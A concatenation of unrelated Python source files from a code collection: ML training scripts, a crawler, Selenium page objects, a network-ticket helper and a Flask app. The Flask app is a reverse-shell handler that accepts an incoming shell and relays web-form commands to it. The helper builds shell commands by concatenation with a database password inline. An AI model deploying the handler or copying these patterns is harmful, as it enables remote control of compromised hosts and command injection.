with open(config['log_dir'] + 'logs/' + log_file_name + '.txt', 'r') as f:
log = f.read()
msg.attach(MIMEText(log))
send.sendmail(config['mail_from'], [config['mailbox']], msg.as_string())
send.quit()
def send_violation(message_dict, restriction, config):
"""
Security message
"""
msg = MIMEMultipart()
msg['Subject'] = 'Security notice. Message from: ' + message_dict['email']
send = smtplib.SMTP(config['mail_server'])
msg.attach(MIMEText(restriction +
'\r\n\r\n----------MESSAGE----------\r\n\r\n' +
message_dict['message']))
send.sendmail(config['mail_from'], [config['mailbox']], msg.as_string())
send.quit()
def send_error(message_dict, error, config):
"""
Error message
"""
msg = MIMEMultipart()
msg['Subject'] = 'Error, such request does not exist'
send = smtplib.SMTP(config['mail_server'])
msg.attach(MIMEText(error +
'\r\n\r\n----------MESSAGE----------\r\n\r\n' +
message_dict['message']))
send.sendmail(config['mail_from'], message_dict['email'], msg.as_string())
send.quit()
def kill_in_mess(message_dict, config):
"""
Forces the request to end if the <KILL> key is present in the message
After the specified key in the message, the ticket tracker must be indicated
"""
try:
reg_kill = r'(task_\S+)'
decoded_message = message_dict['message']
task_match = re.search(reg_kill, decoded_message)
log_file_name = task_match.groups()[0]
kill_proc = int(log_file_name.split('_')[1])
try:
os.kill(kill_proc, 9)
mac = log_file_name.split('__')[1].replace('-', '.')
task_result = log_file_name + ' terminated'
send_end(log_file_name, mac, task_result, config)
mv = 'mv ' + config['log_dir'] + 'logs/' + log_file_name + '.txt ' + \
config['log_dir'] + 'log_archive/' + log_file_name + '.txt'
subprocess.Popen(mv, shell=True)
except Exception as error:
send_error(message_dict, str(error), config)
except Exception as error:
send_error(message_dict, str(error), config)
def ip_list_check(log_file_name, task_params, mac, config):
"""
Checks if a host is on the banned list
"""
if task_params['ip_addr'] not in config['bad_ips']:
logging.info('!!!OK!!! This host is not in the list of excluded addresses\r\n\r\n')
else:
logging.info('!!!NOT OK!!! This host is in the list of excluded addresses\r\n\r\nTask failed')
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
def sql_answer_check(log_file_name, sql_answer, mac, config):
"""
Checks the response from the log server DB
"""
if 'Task failed' in sql_answer['answer']:
logging.info(sql_answer['answer'])
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
else:
logging.info('SQL_ANSWER: ' + sql_answer['answer'] + '\r\n')
def clean_message(raw_message_dict):
"""
Message clearing
"""
reg_mess = r'<[\s\S|.]*?>| |"|.*?;}'
clean_mess = re.sub(reg_mess, '', raw_message_dict['message'])
reg_line_break = r'(\r\n){5,}'
clean_mess = re.sub(reg_line_break, '\r\n', clean_mess)
raw_message_dict.update({'message': clean_mess})
return raw_message_dict
def find_macs_in_mess(decoded_message):
"""
Finding the MAC address in a message
"""
reg = re.compile('\s(?P<mac>([0-9A-Fa-fАаВСсЕеOО]{2}[\s:.-]){5}([0-9A-Fa-fАаВСсЕеOО]{2})'
'|([0-9A-Fa-fАаВСсЕеOО]{3}[\s:.-]){3}([0-9A-Fa-fАаВСсЕеOО]{3})'
'|([([0-9A-Fa-fАаВСсЕеOО]{4}[\s:.-]){2}([0-9A-Fa-fАаВСсЕеOО]{4})'
'|([0-9A-Fa-fАаВСсЕеOО]{12}))\s')
m = reg.finditer(decoded_message)
matches = []
for mat in m:
matches.append(mat.group('mac'))
format_matches = []
for match in matches:
match = match.replace(':', "").replace('-', "").replace('.', "") \
.replace(' ', "").replace('\n', "").replace('\t', "")
match = match.lower()
# Replace Cyrillic characters
match = match.replace('а', 'a').replace('в', 'b').replace('с', 'c') \
.replace('е', 'e').replace('о', '0').replace('o', '0')
format_matches.append(match)
if len(format_matches) == 1:
new_mac = format_matches[0]
return new_mac
elif len(format_matches) == 0:
no_mac = 'No MAC addresses found\r\n\r\nTask failed'
return no_mac
elif len(format_matches) >= 2:
too_much_mac = 'Too many matches\r\n\r\nTask failed'
return too_much_mac
def find_macs_in_mess_check(log_file_name, mac, config):
"""
Is there a MAC address in the message?
"""
if 'No MAC addresses found' in mac:
logging.info(mac)
mac = 'No MAC addresses found'
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
elif 'Too many matches' in mac:
logging.info(mac)
mac = 'Too many matches'
task_result = 'Task failed'
end_task(log_file_name, mac, task_result, config)
def create_sql_query(mac, config):
"""
Creates a SQL query for the log server
"""
mac_cisco = mac[:4] + '.' + mac[4:8] + '.' + mac[8:12]
match_sql = ('''mysql -u ''' + config['db_user'] + ''' -p''' + config['db_pass'] +
''' -D Syslog -e "SELECT FromHost, Message FROM SystemEvents WHERE DeviceReportedTime LIKE '%''' +
datetime.datetime.today().strftime('%Y-%m-%d') +
'''%' AND Message REGEXP '.*(''' + mac_cisco +
''').*' ORDER BY ID DESC LIMIT 1;"''')
return match_sql
def end_task(log_file_name, mac, task_result, config):
"""
Ends a request
"""
send_end(log_file_name, mac, task_result, config)
mv = 'mv ' + config['log_dir'] + 'logs/' + log_file_name + '.txt ' + \
config['log_dir'] + 'log_archive/' + log_file_name + '.txt'
subprocess.Popen(mv, shell=True)
sys.exit()
```
#### File: 5lunk/psec/wrapp_class.py
```python
from service_funcs import end_task
class Wrapp:
"""
Class for handling connection methods
"""
@staticmethod
def failed_check(method):
"""
Decorator
If passed, go to the next
"""
def wrapp_failed_check(self):
if method(self) == False:
task_result = 'Task failed'
end_task(self.log_file_name, self.mac, task_result, self.config)
return wrapp_failed_check
@staticmethod
def next_check(method):
"""
Decorator
If not passed, go to the next
"""
def wrapp_next_check(self):
if method(self) == True:
task_result = 'Task completed'
end_task(self.log_file_name, self.mac, task_result, self.config)
return wrapp_next_check
@staticmethod
def pass_check(method):
"""
Decorator
Last check
"""
def wrapp_pass_check(self):
if method(self) == True:
task_result = 'Task completed'
else:
task_result = 'Task failed'
end_task(self.log_file_name, self.mac, task_result, self.config)
return wrapp_pass_check
``` |
{
"source": "5lunk/racks",
"score": 3
} |
#### File: selenium_tests/poms/building_add_page.py
```python
from locators import Locators
class BuildingAddPage():
def __init__(self, driver):
self.driver = driver
self.buildind_name = Locators.building_name
self.building_name_textbox_id = Locators.building_name_textbox_id
self.accept_button_xpath = Locators.accept_button_xpath
def enter_building_name(self, building_name):
self.driver.find_element_by_id(self.building_name_textbox_id). \
send_keys(building_name)
def click_accept(self):
self.driver.find_element_by_xpath(self.accept_button_xpath).click()
```
#### File: selenium_tests/poms/site_add_page.py
```python
from locators import Locators
class SiteAddPage():
def __init__(self, driver):
self.driver = driver
self.site_name = Locators.site_name
self.site_name_textbox_id = Locators.site_name_textbox_id
self.accept_button_xpath = Locators.accept_button_xpath
def enter_site_name(self, site_name):
self.driver.find_element_by_id(self.site_name_textbox_id). \
send_keys(site_name)
def click_accept(self):
self.driver.find_element_by_xpath(self.accept_button_xpath).click()
``` |
{
"source": "5m477/Karkinos",
"score": 3
} |
#### File: bin/Server/app.py
```python
from flask import Flask, render_template, request
import os
import time
import struct
import socket
import threading
app = Flask(__name__)
wsgi_app = app.wsgi_app
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Server not running')
func()
def startListen():
global client_address, client_socket, s
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
client_socket, client_address = s.accept()
return client_socket
def getData(client_socket):
#client_socket.setblocking(0)
client_socket.settimeout(0.5)
data = bytearray()
try:
while 1:
packet = client_socket.recv(BUFFER_SIZE)
#print(packet)
data.extend(packet)
except socket.timeout as e:
print(data)
return data.decode()
return data.decode()
def shell(c):
global thread, client_socket, s
command = c + "\n"
client_socket.send(command.encode())
return True
@app.route('/config', methods = ['POST'])
def config():
global SERVER_PORT, connected
SERVER_PORT = int(request.form['port'])
print(SERVER_PORT)
if connected == False:
tmpsock = startListen()
out = getData(tmpsock)
connected = True
return render_template('index.html', out=out)
@app.route('/', methods = ['POST', 'GET'])
def index():
global out, client_socket
if request.method == "POST":
c = request.form['command']
shell(c)
out += getData(client_socket)
out += "\n\n"
return render_template('index.html', out=out)
@app.route('/shutdown', methods=['POST'])
def shutdown():
shutdown_server()
return 'Server shutting down...'
if __name__ == '__main__':
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5011
BUFFER_SIZE = 1024
client_socket = ""
client_address = ""
out = ""
connected = False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
PORT = int(os.environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
app.run(SERVER_HOST, PORT)
``` |
{
"source": "5m477/Python-Automation-Cookbook",
"score": 3
} |
#### File: Python-Automation-Cookbook/Chapter03/crawling_web_step1.py
```python
import argparse
import requests
import logging
import http.client
import re
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
DEFAULT_PHRASE = 'python'
def process_link(source_link, text):
logging.info(f'Extracting links from {source_link}')
parsed_source = urlparse(source_link)
result = requests.get(source_link)
if result.status_code != http.client.OK:
logging.error(f'Error retrieving {source_link}: {result}')
return []
if 'html' not in result.headers['Content-type']:
logging.info(f'Link {source_link} is not an HTML page')
return []
page = BeautifulSoup(result.text, 'html.parser')
search_text(source_link, page, text)
return get_links(parsed_source, page)
def get_links(parsed_source, page):
'''Retrieve the links on the page'''
links = []
for element in page.find_all('a'):
link = element.get('href')
if not link:
continue
# Avoid internal, same page links
if link.startswith('#'):
continue
# Always accept local links
if not link.startswith('http'):
netloc = parsed_source.netloc
scheme = parsed_source.scheme
path = urljoin(parsed_source.path, link)
link = f'{scheme}://{netloc}{path}'
# Only parse links in the same domain
if parsed_source.netloc not in link:
continue
links.append(link)
return links
def search_text(source_link, page, text):
'''Search for an element with the searched text and print it'''
for element in page.find_all(text=re.compile(text, flags=re.IGNORECASE)):
print(f'Link {source_link}: --> {element}')
def main(base_url, to_search):
checked_links = set()
to_check = [base_url]
max_checks = 10
while to_check and max_checks:
link = to_check.pop(0)
links = process_link(link, text=to_search)
checked_links.add(link)
for link in links:
if link not in checked_links:
checked_links.add(link)
to_check.append(link)
max_checks -= 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(dest='url', type=str,
help='Base site url. '
'Use "http://localhost:8000/" '
'for the recipe example')
parser.add_argument('-p', type=str,
help=f'Sentence to search, default: {DEFAULT_PHRASE}',
default=DEFAULT_PHRASE)
args = parser.parse_args()
main(args.url, args.p)
``` |
{
"source": "5m477/samples-for-ai",
"score": 3
} |
#### File: keras/Image_Captioning/Image_Captioning.py
```python
# coding: utf-8
import glob
from PIL import Image
import numpy as np
import pickle
from tqdm import tqdm
import pandas as pd
import keras
from keras.callbacks import Callback
import matplotlib.pyplot as plt
from keras.callbacks import History
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Add, LSTM, Embedding, TimeDistributed, Dense, RepeatVector, Activation, Flatten, Merge
from keras.layers import concatenate
from keras.optimizers import Adam, RMSprop
from keras.layers.wrappers import Bidirectional
from keras.applications.inception_v3 import InceptionV3
from keras.preprocessing import image
from keras.models import Model
from keras.models import load_model
from keras.utils import plot_model
from IPython.display import clear_output
import os
#The dataset can be obtained in http://lixirong.net/datasets/flickr8kcn
token = './input/Flickr8k_text/Flickr8k.token.txt'
captions = open(token, 'r').read().strip().split('\n')
d = {}
for i, row in enumerate(captions):
row = row.split('\t')
row[0] = row[0][:len(row[0])-2]
if row[0] in d:
d[row[0]].append(row[1])
else:
d[row[0]] = [row[1]]
images = './input/Flicker8k_Dataset/'
img = glob.glob(images+'*.jpg')
train_images_file = './input/Flickr8k_text/Flickr_8k.trainImages.txt'
train_images = set(open(train_images_file, 'r').read().strip().split('\n'))
def split_data(l):
temp = []
for i in l:
temp.append(images+i)
return temp
train_img = split_data(train_images)
val_images_file = './input/Flickr8k_text/Flickr_8k.devImages.txt'
val_images = set(open(val_images_file, 'r').read().strip().split('\n'))
# Getting the validation images from all the images
val_img = split_data(val_images)
len(val_img)
test_images_file = './input/Flickr8k_text/Flickr_8k.testImages.txt'
test_images = set(open(test_images_file, 'r').read().strip().split('\n'))
# Getting the testing images from all the images
test_img = split_data(test_images)
len(test_img)
def preprocess_input(x):
x /= 255.
x -= 0.5
x *= 2.
return x
def preprocess(path):
img = image.load_img(path, target_size=(299, 299))
x = image.img_to_array(img)
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
from keras.models import Model
model = InceptionV3(weights='imagenet')
new_input = model.input
hidden_layer = model.layers[-2].output
model_new = Model(new_input, hidden_layer)
import os
def encode(image):
image = preprocess(image)
temp_enc = model_new.predict(image)
temp_enc = np.reshape(temp_enc, temp_enc.shape[1])
return temp_enc
encoding_train = {}
#encoding the images and saving in pickle
if os.path.exists('encoded_images_inceptionV3.p') != True:
for img in tqdm(train_img):
encoding_train[img[len(images):]] = encode(img)
with open("encoded_images_inceptionV3.p", "wb") as encoded_pickle:
pickle.dump(encoding_train, encoded_pickle)
else:
encoding_train = pickle.load(open('encoded_images_inceptionV3.p', 'rb'))
encoding_test = {}
if os.path.exists('encoded_images_test_inceptionV3.p') != True:
for img in tqdm(test_img):
encoding_test[img[len(images):]] = encode(img)
with open("encoded_images_test_inceptionV3.p", "wb") as encoded_pickle:
pickle.dump(encoding_test, encoded_pickle)
else:
encoding_test = pickle.load(open('encoded_images_test_inceptionV3.p', 'rb'))
encoding_val = {}
if os.path.exists('encoded_images_val_inceptionV3.p') != True:
for img in tqdm(val_img):
encoding_val[img[len(images):]] = encode(img)
with open("encoded_images_val_inceptionV3.p", "wb") as encoded_pickle:
pickle.dump(encoding_val, encoded_pickle)
else:
encoding_val = pickle.load(open('encoded_images_val_inceptionV3.p', 'rb'))
train_d = {}
for i in train_img:
if i[len(images):] in d:
train_d[i] = d[i[len(images):]]
val_d = {}
for i in val_img:
if i[len(images):] in d:
val_d[i] = d[i[len(images):]]
test_d = {}
for i in test_img:
if i[len(images):] in d:
test_d[i] = d[i[len(images):]]
captions = []
for key, val in train_d.items():
for i in val:
captions.append('<start> ' + i + ' <end>')
captions_all = []
all_img = []
for i in img:
all_img.append(i)
all_d = {}
for i in all_img:
if i[len(images):] in d:
all_d[i] = d[i[len(images):]]
captions_all = []
for key, val in all_d.items():
for i in val:
captions_all.append('<start> ' + i + ' <end>')
words = [i.split() for i in captions_all]
unique = []
for i in words:
unique.extend(i)
unique = list(set(unique))
word2idx = {val:index for index, val in enumerate(unique)}
idx2word = {index:val for index, val in enumerate(unique)}
vocab_size = len(unique)
f = open('flickr8k_training_dataset.txt', 'w')
f.write("image_id\tcaptions\n")
# creating table in file <image_id>\t<caption>
for key, val in train_d.items():
for i in val:
f.write(key[len(images):] + "\t" + "<start> " + i +" <end>" + "\n")
f.close()
df = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\t')
c = [i for i in df['captions']]
imgs = [i for i in df['image_id']]
samples_per_epoch = 0
for ca in captions:
samples_per_epoch += len(ca.split()) - 1
max_len = 40
captions_val = []
for key, val in val_d.items():
for i in val:
captions_val.append('<start> ' + i + ' <end>')
f = open('flickr8k_validation_dataset.txt', 'w')
f.write("image_id\tcaptions\n")
# creating table in file <image_id>\t<caption>
# creating table in file <image_id>\t<caption>
for key, val in val_d.items():
for i in val:
f.write(key[len(images):] + "\t" + "<start> " + i +" <end>" + "\n")
f.close()
df = pd.read_csv('flickr8k_validation_dataset.txt', delimiter='\t')
c = [i for i in df['captions']]
imgs = [i for i in df['image_id']]
num_val = 0
for ca in captions_val:
num_val += len(ca.split()) - 1
def data_generator(batch_size = 32):
partial_caps = []
next_words = []
images = []
df = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\t')
df = df.sample(frac=1)
iter = df.iterrows()
c = []
imgs = []
for i in range(df.shape[0]):
x = next(iter)
c.append(x[1][1])
imgs.append(x[1][0])
count = 0
while True:
for j, text in enumerate(c):
current_image = encoding_train[imgs[j]]
for i in range(len(text.split())-1):
count+=1
partial = [word2idx[txt] for txt in text.split()[:i+1]]
partial_caps.append(partial)
# Initializing with zeros to create a one-hot encoding matrix
# This is what we have to predict
# Hence initializing it with vocab_size length
n = np.zeros(vocab_size)
# Setting the next word to 1 in the one-hot encoded matrix
n[word2idx[text.split()[i+1]]] = 1
next_words.append(n)
images.append(current_image)
if count>=batch_size:
next_words = np.asarray(next_words)
images = np.asarray(images)
partial_caps = sequence.pad_sequences(partial_caps, maxlen=max_len, padding='post')
# x=[[images, partial_caps], next_words]
# print(x.shape[0], x.shape[1])
yield [[images, partial_caps], next_words]
partial_caps = []
next_words = []
images = []
count = 0
def data_generator_val(batch_size = 512):
partial_caps = []
next_words = []
images = []
df = pd.read_csv('flickr8k_validation_dataset.txt', delimiter='\t')
df = df.sample(frac=1)
iter = df.iterrows()
c = []
imgs = []
for i in range(df.shape[0]):
x = next(iter)
c.append(x[1][1])
imgs.append(x[1][0])
count = 0
while True:
for j, text in enumerate(c):
current_image = encoding_val[imgs[j]]
for i in range(len(text.split())-1):
count+=1
partial = [word2idx[txt] for txt in text.split()[:i+1]]
partial_caps.append(partial)
# Initializing with zeros to create a one-hot encoding matrix
# This is what we have to predict
# Hence initializing it with vocab_size length
n = np.zeros(vocab_size)
# Setting the next word to 1 in the one-hot encoded matrix
n[word2idx[text.split()[i+1]]] = 1
next_words.append(n)
images.append(current_image)
if count>=batch_size:
next_words = np.asarray(next_words)
images = np.asarray(images)
partial_caps = sequence.pad_sequences(partial_caps, maxlen=max_len, padding='post')
# x=[[images, partial_caps], next_words]
# print(x.shape[0], x.shape[1])
yield [[images, partial_caps], next_words]
partial_caps = []
next_words = []
images = []
count = 0
file = open("accuracy.txt", 'w')
file1 = open("loss.txt", 'w')
file2 = open("accuracy_val.txt", 'w')
file3 = open("loss_val.txt", 'w')
# recording acc and loss after each batch
class PlotLosses(Callback):
def __init__(self, model, N):
self.model = model
self.N = N
self.batch = 0
def on_batch_end(self, batch, logs={}):
#if self.batch % self.N == 0:
# name = './weights_after_batches/weights%08d.h5' % batch
# self.model.save_weights(name)
self.batch += 1
def on_epoch_end(self, epoch, logs={}):
file.write("%s\n" %logs.get('acc') )
file1.write("%s\n" %logs.get('loss'))
file2.write("%s\n" %logs.get('val_acc') )
file3.write("%s\n" %logs.get('val_loss'))
embedding_size = 300
image_model = Sequential([
Dense(embedding_size, input_shape=(2048,), activation='relu'),
RepeatVector(max_len)
])
caption_model = Sequential([
Embedding(vocab_size, embedding_size, input_length=max_len),
LSTM(256, return_sequences=True),
TimeDistributed(Dense(300))
])
# merging the models
final_model = Sequential([
Merge([image_model, caption_model], mode='concat', concat_axis=1),
Bidirectional(LSTM(256, return_sequences=False)),
Dense(vocab_size),
Activation('softmax')
])
final_model.compile(loss='categorical_crossentropy', optimizer=RMSprop(), metrics=['accuracy'])
final_model.summary()
final_model.fit_generator(data_generator(batch_size=512), steps_per_epoch=748, validation_data=data_generator(batch_size = 512),validation_steps = 125, workers=4, use_multiprocessing=False,callbacks=[PlotLosses(final_model, 10)],epochs=57)
# save the best weight after training
file.close()
file1.close()
file2.close()
file3.close()
model.save("best_weight.hdf5", overwrite= True)
def predict_captions(image):
start_word = ["<start>"]
while True:
par_caps = [word2idx[i] for i in start_word]
par_caps = sequence.pad_sequences([par_caps], maxlen=max_len, padding='post')
e = encoding_test[image[len(images):]]
preds = final_model.predict([np.array([e]), np.array(par_caps)])
word_pred = idx2word[np.argmax(preds[0])]
start_word.append(word_pred)
if word_pred == "<end>" or len(start_word) > max_len:
break
return ' '.join(start_word[1:-1])
def beam_search_predictions(image, beam_index=3):
start = [word2idx["<start>"]]
start_word = [[start, 0.0]]
while len(start_word[0][0]) < max_len:
temp = []
for s in start_word:
par_caps = sequence.pad_sequences([s[0]], maxlen=max_len, padding='post')
e = encoding_test[image[len(images):]]
preds = final_model.predict([np.array([e]), np.array(par_caps)])
word_preds = np.argsort(preds[0])[-beam_index:]
# Getting the top <beam_index>(n) predictions and creating a
# new list so as to put them via the model again
for w in word_preds:
next_cap, prob = s[0][:], s[1]
next_cap.append(w)
prob += preds[0][w]
temp.append([next_cap, prob])
start_word = temp
# Sorting according to the probabilities
start_word = sorted(start_word, reverse=False, key=lambda l: l[1])
# Getting the top word
start_word = start_word[-beam_index:]
start_word = start_word[-1][0]
intermediate_caption = [idx2word[i] for i in start_word]
final_caption = []
for i in intermediate_caption:
if i != '<end>':
final_caption.append(i)
else:
break
final_caption = ' '.join(final_caption[1:])
return final_caption
```
#### File: NLPTutorials/language_model/language_model.py
```python
# ====================================================================================================== #
# The MIT License (MIT)
# Copyright (c) Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ====================================================================================================== #
import argparse
import math
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torchtext import data, datasets
class RNNModel(nn.Module):
def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False):
super(RNNModel, self).__init__()
print("building RNN language model...")
self.drop = nn.Dropout(dropout)
self.encoder = nn.Embedding(ntoken, ninp)
if rnn_type in ['LSTM', 'GRU']:
self.rnn = getattr(nn, rnn_type)(ninp, nhid,nlayers, dropout=dropout)
else:
nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity, dropout=dropout)
self.decoder = nn.Linear(nhid, ntoken)
if tie_weights:
if nhid != ninp:
raise ValueError('tied: nhid and emsize must be equal')
self.decoder.weight = self.encoder.weight
self.init_weights()
self.rnn_type = rnn_type
self.nhid = nhid
self.nlayers = nlayers
def init_weights(self):
initrange = 0.1
nn.init.uniform_(self.encoder.weight, -initrange, initrange)
self.decoder.bias.data.zero_()
nn.init.uniform_(self.decoder.weight, -initrange, initrange)
def forward(self, input, hidden):
emb = self.drop(self.encoder(input))
output, hidden = self.rnn(emb, hidden)
output = self.drop(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
decoded = decoded.view(output.size(0), output.size(1), decoded.size(1))
return decoded, hidden
def init_hidden(self, bsz):
weight = next(self.parameters())
if self.rnn_type == 'LSTM':
return (weight.new_zeros(self.nlayers, bsz, self.nhid), weight.new_zeros(self.nlayers, bsz, self.nhid))
else:
return weight.new_zeros(self.nlayers, bsz, self.nhid)
def repackage_hidden(h):
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
def get_wikitext_iter(args):
TEXT = data.Field()
train_data, val_data, test_data = datasets.WikiText2.splits(TEXT)
TEXT.build_vocab(train_data, min_freq=10)
train_iter, val_iter, test_iter = data.BPTTIterator.splits(
(train_data, val_data, test_data),
batch_size=args.batch_size, bptt_len=30, repeat=False)
vocab_size = len(TEXT.vocab)
return train_iter, val_iter, test_iter, vocab_size, TEXT.vocab
def evaluate(model, val_iter, vocab_size):
model.eval()
total_loss = 0
hidden = model.init_hidden(val_iter.batch_size)
for b, batch in enumerate(val_iter):
x, y = batch.text, batch.target
x = x.to(device)
y = y.to(device)
output, hidden = model(x, hidden)
loss = F.cross_entropy(output.view(-1, vocab_size), y.contiguous().view(-1))
total_loss += loss.item()
hidden = repackage_hidden(hidden)
return total_loss / len(val_iter)
def generate(args):
_, _, _, vocab_size, vocab= get_wikitext_iter(args)
model = RNNModel('LSTM', ntoken=vocab_size, ninp=600, nhid=600, nlayers=2, dropout=0.5).to(device)
model.load_state_dict(torch.load(os.path.join(args.model_dir, args.model_name)))
model.eval()
hidden = model.init_hidden(1)
input = torch.randint(vocab_size, (1, 1), dtype=torch.long).to(device)
word_list = []
for i in range(args.gen_word_len):
output, hidden = model(input, hidden)
word_weights = output.squeeze().div(1).exp().cpu()
word_idx = torch.multinomial(word_weights, 1)[0]
input.fill_(word_idx)
word = vocab.itos[word_idx]
word_list.append(word)
print(' '.join(word_list))
def train(args):
print("[!] preparing dataset...")
train_iter, val_iter, test_iter, vocab_size, _ = get_wikitext_iter(args)
print("[TRAIN]:%d\t[VALID]:%d\t[TEST]:%d\t[VOCAB]%d" % (len(train_iter), len(val_iter), len(test_iter), vocab_size))
print("[!] Instantiating models...")
model = RNNModel('LSTM', ntoken=vocab_size, ninp=600, nhid=600, nlayers=2, dropout=0.5).to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
print(model)
best_val_loss = None
for e in range(1, args.epochs+1):
model.train()
total_loss = 0
hidden = model.init_hidden(train_iter.batch_size)
for b, batch in enumerate(train_iter):
x, y = batch.text, batch.target
x = x.to(device)
y = y.to(device)
optimizer.zero_grad()
output, hidden = model(x, hidden)
hidden = repackage_hidden(hidden)
loss = F.cross_entropy(output.view(-1, vocab_size), y.contiguous().view(-1))
loss.backward()
# Prevent the exploding gradient problem in RNNs / LSTMs.
nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)
optimizer.step()
total_loss += loss.item()
if b % args.log_interval == 0 and b > 0:
cur_loss = total_loss / args.log_interval
print("[Epoch: %d, batch: %d] loss:%5.2f | pp:%5.2f" % (e, b, cur_loss, math.exp(cur_loss)))
total_loss = 0
val_loss = evaluate(model, val_iter, vocab_size)
print("[Epoch: %d] val-loss:%5.2f | val-pp:%5.2f" % (e, val_loss, math.exp(val_loss)))
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
print("[!] saving model")
if not os.path.isdir(args.model_dir):
os.makedirs(args.model_dir)
torch.save(model.state_dict(), os.path.join(args.model_dir, args.model_name))
best_val_loss = val_loss
print("[!] training done")
model.load_state_dict(torch.load(os.path.join(args.model_dir, args.model_name)))
test_loss = evaluate(model, test_iter, vocab_size)
print("test-loss:%5.2f | test-pp:%5.2f" % (test_loss, math.exp(test_loss)))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Hyperparams')
parser.add_argument('--epochs', type=int, default=20, help='number of epochs for train')
parser.add_argument('--batch_size', type=int, default=20, help='batch_size')
parser.add_argument('--lr', type=float, default=0.0001, help='learning rate')
parser.add_argument('--grad_clip', type=float, default=0.25, help='max norm of the gradients')
parser.add_argument('--log_interval', type=int, default=100, help='print log every _')
parser.add_argument('--model_dir', type=str, default='.save/', help='directory to save the trained weights')
parser.add_argument('--model_name', type=str, default='lm_best_model.pt', help='the model file name')
parser.add_argument('--gen_word_len', type=int, default=15, help='word number of generations')
args = parser.parse_args()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train(args)
print("[!] generating...")
generate(args)
```
#### File: pytorch/ScreenerNet/snet_mnist.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision
import torchvision.transforms as transforms
from collections import OrderedDict
# =========== configuration ==============
M = 1.0
alpha = 0.01
def getLoader(phase, download=False):
if phase=='train':
trainset = torchvision.datasets.MNIST(root='.', train=True,
transform=transforms.ToTensor(), download=download)
loader = torch.utils.data.DataLoader(trainset, batch_size=64,
shuffle=True, num_workers=4)
else:
testset = torchvision.datasets.MNIST(root='.', train=False, transform=transforms.ToTensor(), download=download)
loader = torch.utils.data.DataLoader(testset, batch_size=1, shuffle=False, num_workers=1)
return loader
def create_net():
net, snet = BaseNet(),Screener()
return net, snet
# =========== Module ====================
class BaseNet(nn.Module):
def __init__(self):
super(BaseNet, self).__init__()
self.conv1 = nn.Conv2d(1, 10, 5) # 28-5+1=24->12
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(10, 20, 5) # 12-5+1=8->4
self.dropout = nn.Dropout2d()
self.fc1 = nn.Linear(20 * 4 * 4, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.dropout(self.conv2(x))
x = self.pool(F.relu(x))
x = x.view(-1, 20 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
class Screener(nn.Module):
def __init__(self):
super(Screener, self).__init__()
self.model = nn.Sequential(OrderedDict([
('conv1',nn.Conv2d(1,4,3)),('act1',nn.ELU()), # 28-3+1=26
('conv2',nn.Conv2d(4,8,3)),('act2',nn.ELU()), # 26-3+1=24
('conv3',nn.Conv2d(8,16,3)),('act3',nn.ELU()), # 24-3+1=22
('conv4',nn.Conv2d(16,32,3)),('act4',nn.ELU())])) # 22-3+1=20
self.fc = nn.Linear(20*20*32,1)
def forward(self, x):
x = self.model(x)
x = x.view(-1, 20*20*32)
out = F.sigmoid(self.fc(x))
return out
```
#### File: StyleTransferTraining/src/export.py
```python
import argparse
import os
import shutil
import sys
import tensorflow as tf
sys.path.insert(0, '.')
from stylenet import net
from utils import info, error, fail
def export(args):
ckpt_dir = os.path.expanduser(args.ckpt_dir)
export_dir = os.path.expanduser(args.export_dir)
if os.path.isdir(export_dir):
info('Deleting the folder containing SavedModel at ' + export_dir)
shutil.rmtree(export_dir)
# Construct the serving graph
batch_shape = (args.batch_size, args.height, args.width, 3)
img_placeholder = tf.placeholder(tf.float32, shape=batch_shape)
preds = net(img_placeholder)
saver = tf.train.Saver()
